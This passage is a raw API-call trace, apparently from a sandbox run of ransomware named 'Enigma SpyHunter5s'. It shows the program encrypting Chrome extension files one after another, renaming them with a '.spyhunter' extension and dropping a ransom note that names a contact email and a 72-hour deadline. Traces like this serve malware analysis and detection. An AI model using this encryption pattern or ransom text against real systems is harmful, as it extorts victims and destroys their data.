lpNumberOfBytesWritten=0x25cebd4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebd4*=0x30, lpOverlapped=0x0) returned 1 [0157.537] CloseHandle (hObject=0xa0) returned 1 [0157.537] GetProcessHeap () returned 0x2c0000 [0157.537] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.537] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.spyhunter") returned 174 [0157.537] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.spyhunter")) returned 1 [0157.538] GetProcessHeap () returned 0x2c0000 [0157.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.538] GetProcessHeap () returned 0x2c0000 [0157.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.538] GetProcessHeap () returned 0x2c0000 [0157.538] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24988 | out: hHeap=0x2c0000) returned 1 [0157.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.539] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.539] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb47*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec70, lpOverlapped=0x0 | out: lpBuffer=0x25ceb47*, lpNumberOfBytesWritten=0x25cec70*=0x127, lpOverlapped=0x0) returned 1 [0157.540] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.540] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec70, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec70*=0x2ac, lpOverlapped=0x0) returned 1 [0157.540] CloseHandle (hObject=0xa0) returned 1 [0157.540] GetProcessHeap () returned 0x2c0000 [0157.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f247f0 | out: hHeap=0x2c0000) returned 1 [0157.540] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec10 | out: pbBuffer=0x25cec10) returned 1 [0157.541] GetProcessHeap () returned 0x2c0000 [0157.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.541] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec08*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec08*=0x30) returned 1 [0157.541] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.541] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json") returned 164 [0157.541] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.541] GetProcessHeap () returned 0x2c0000 [0157.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0157.541] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cebcc*=0x2800, lpOverlapped=0x0) returned 1 [0157.693] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.693] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebcc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cebcc*=0x2800, lpOverlapped=0x0) returned 1 [0157.693] GetProcessHeap () returned 0x2c0000 [0157.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0157.694] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.694] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebcc, lpOverlapped=0x0 | out: lpBuffer=0x25cec0c*, lpNumberOfBytesWritten=0x25cebcc*=0x4, lpOverlapped=0x0) returned 1 [0157.709] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebcc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebcc*=0x30, lpOverlapped=0x0) returned 1 [0157.709] CloseHandle (hObject=0xa0) returned 1 [0157.709] GetProcessHeap () returned 0x2c0000 [0157.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.709] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.spyhunter") returned 174 [0157.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0157.710] GetProcessHeap () returned 0x2c0000 [0157.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.710] GetProcessHeap () returned 0x2c0000 [0157.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.711] GetProcessHeap () returned 0x2c0000 [0157.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f24658 | out: hHeap=0x2c0000) returned 1 [0157.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.711] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.711] WriteFile (in: hFile=0xa0, lpBuffer=0x25ceb3f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cec68, lpOverlapped=0x0 | out: lpBuffer=0x25ceb3f*, lpNumberOfBytesWritten=0x25cec68*=0x127, lpOverlapped=0x0) returned 1 [0157.715] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.715] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cec68, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cec68*=0x2ac, lpOverlapped=0x0) returned 1 [0157.715] CloseHandle (hObject=0xa0) returned 1 [0157.715] GetProcessHeap () returned 0x2c0000 [0157.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f23e60 | out: hHeap=0x2c0000) returned 1 [0157.715] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec08 | out: pbBuffer=0x25cec08) returned 1 [0157.715] GetProcessHeap () returned 0x2c0000 [0157.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.715] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cec00*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cec00*=0x30) returned 1 [0157.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.716] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json") returned 164 [0157.716] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.716] GetProcessHeap () returned 0x2c0000 [0157.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.716] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cebc4*=0x2800, lpOverlapped=0x0) returned 1 [0157.865] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.865] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cebc4*=0x2800, lpOverlapped=0x0) returned 1 [0157.865] GetProcessHeap () returned 0x2c0000 [0157.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.865] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.865] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebc4, lpOverlapped=0x0 | out: lpBuffer=0x25cec04*, lpNumberOfBytesWritten=0x25cebc4*=0x4, lpOverlapped=0x0) returned 1 [0157.879] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebc4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebc4*=0x30, lpOverlapped=0x0) returned 1 [0157.879] CloseHandle (hObject=0xa0) returned 1 [0157.879] GetProcessHeap () returned 0x2c0000 [0157.879] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.883] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.spyhunter") returned 174 [0157.883] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0157.884] GetProcessHeap () returned 0x2c0000 [0157.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.884] GetProcessHeap () returned 0x2c0000 [0157.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0157.884] GetProcessHeap () returned 0x2c0000 [0157.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f23cc8 | out: hHeap=0x2c0000) returned 1 [0157.884] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec00 | out: pbBuffer=0x25cec00) returned 1 [0157.884] GetProcessHeap () returned 0x2c0000 [0157.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0157.884] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebf8*=0x30) returned 1 [0157.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0157.888] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js") returned 158 [0157.888] StrStrW (lpFirst="mirroring_common.js", lpSrch=".txt") returned 0x0 [0157.888] GetProcessHeap () returned 0x2c0000 [0157.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0157.888] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cebbc*=0x2800, lpOverlapped=0x0) returned 1 [0157.897] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.897] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cebbc*=0x2800, lpOverlapped=0x0) returned 1 [0157.897] GetProcessHeap () returned 0x2c0000 [0157.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0157.897] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.897] WriteFile (in: hFile=0xa0, lpBuffer=0x25cebfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x25cebfc*, lpNumberOfBytesWritten=0x25cebbc*=0x4, lpOverlapped=0x0) returned 1 [0158.002] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebbc*=0x30, lpOverlapped=0x0) returned 1 [0158.002] CloseHandle (hObject=0xa0) returned 1 [0158.010] GetProcessHeap () returned 0x2c0000 [0158.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0158.010] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.spyhunter") returned 168 [0158.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_common.js.spyhunter")) returned 1 [0158.012] GetProcessHeap () returned 0x2c0000 [0158.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0158.012] GetProcessHeap () returned 0x2c0000 [0158.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0158.012] GetProcessHeap () returned 0x2c0000 [0158.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f21fd8 | out: hHeap=0x2c0000) returned 1 [0158.012] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cec00 | out: pbBuffer=0x25cec00) returned 1 [0158.012] GetProcessHeap () returned 0x2c0000 [0158.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0158.012] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cebf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cebf8*=0x30) returned 1 [0158.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0158.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\manifest.json") returned 152 [0158.013] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0158.013] GetProcessHeap () returned 0x2c0000 [0158.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0158.013] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cebbc*=0x8f8, lpOverlapped=0x0) returned 1 [0158.018] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff708, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.018] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cebbc*=0x8f8, lpOverlapped=0x0) returned 1 [0158.018] GetProcessHeap () returned 0x2c0000 [0158.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0158.018] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.018] WriteFile (in: hFile=0xa0, lpBuffer=0x25cebfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x25cebfc*, lpNumberOfBytesWritten=0x25cebbc*=0x4, lpOverlapped=0x0) returned 1 [0158.018] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cebbc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cebbc*=0x30, lpOverlapped=0x0) returned 1 [0158.019] CloseHandle (hObject=0xa0) returned 1 [0158.019] GetProcessHeap () returned 0x2c0000 [0158.019] RtlAllocateHeap 